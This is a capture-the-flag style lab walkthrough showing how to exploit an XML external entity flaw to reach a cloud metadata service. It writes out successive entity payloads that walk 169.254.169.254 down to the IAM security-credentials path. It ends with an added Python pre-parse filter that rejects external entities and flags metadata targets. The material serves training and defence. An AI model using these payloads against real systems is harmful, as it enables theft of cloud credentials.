
Exploiting XXE to perform SSRF attacks


Let's check the stock of one of the products.


Since we are proxying the requests through Burp Suite, we can go to Proxy > HTTP History to view the request.


We can see that the request contains an XML body.

Let's forward this request to the Repeater for further modification.

Once in the Repeater tab, declare the following external entity after the XML prologue:

<!DOCTYPE test 
[<!ENTITY test SYSTEM "http://169.254.169.254/">]
>


Let's add the latest endpoint to the entity.

[<!ENTITY test SYSTEM "http://169.254.169.254/latest/">]


Let's add the meta-data endpoint to the entity.

[<!ENTITY test SYSTEM "http://169.254.169.254/latest/meta-data/">]


Let's add the iam endpoint to the entity.

[<!ENTITY test SYSTEM "http://169.254.169.254/latest/meta-data/iam/">]


Let's add the credentials endpoint to the entity.

[<!ENTITY test SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]


Let's add the admin endpoint to the entity.

[<!ENTITY test SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/">]


We have solved the lab.
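
The defender's side of the request above, as an added example that is not part of the original walkthrough: a pre-parse gate built on Python's standard expat bindings that refuses any body declaring an external entity and labels declarations aimed at 169.254.169.254. The function names and the sample stockCheck bodies are constructed for illustration.

```python
import ipaddress
import xml.parsers.expat
from urllib.parse import urlsplit

METADATA_IP = ipaddress.ip_address("169.254.169.254")  # address used on this page


class ExternalEntity(Exception):
    """Carries the SYSTEM identifier of the first external entity declared."""


def classify_target(system_id):
    """Label where a SYSTEM identifier points, without ever fetching it."""
    host = urlsplit(system_id).hostname
    try:
        ip = ipaddress.ip_address(host or "")
    except ValueError:
        return "external-entity"          # hostname, or a scheme with no host
    if ip == METADATA_IP:
        return "cloud-metadata-ssrf"
    if ip.is_link_local or ip.is_private or ip.is_loopback:
        return "internal-address-ssrf"
    return "external-entity"


def screen_xml(body):
    """Return (accepted, reason); any entity declared with a SYSTEM id is refused."""
    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:         # external entity: value is None
            raise ExternalEntity(system_id)

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity  # fires while the DTD is read
    try:
        parser.Parse(body, True)
    except ExternalEntity as hit:
        return False, classify_target(str(hit))
    except xml.parsers.expat.ExpatError:
        return False, "malformed-xml"
    return True, "ok"


# Constructed sample bodies (element names are assumptions, not taken from the lab).
BENIGN = b'<?xml version="1.0"?><stockCheck><productId>1</productId></stockCheck>'
PROBE = (b'<?xml version="1.0"?><!DOCTYPE test '
         b'[<!ENTITY test SYSTEM "http://169.254.169.254/latest/meta-data/">]>'
         b'<stockCheck><productId>1</productId></stockCheck>')
```

The gate rejects on the declaration itself, so it does not depend on whether the entity is ever referenced in the document body.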
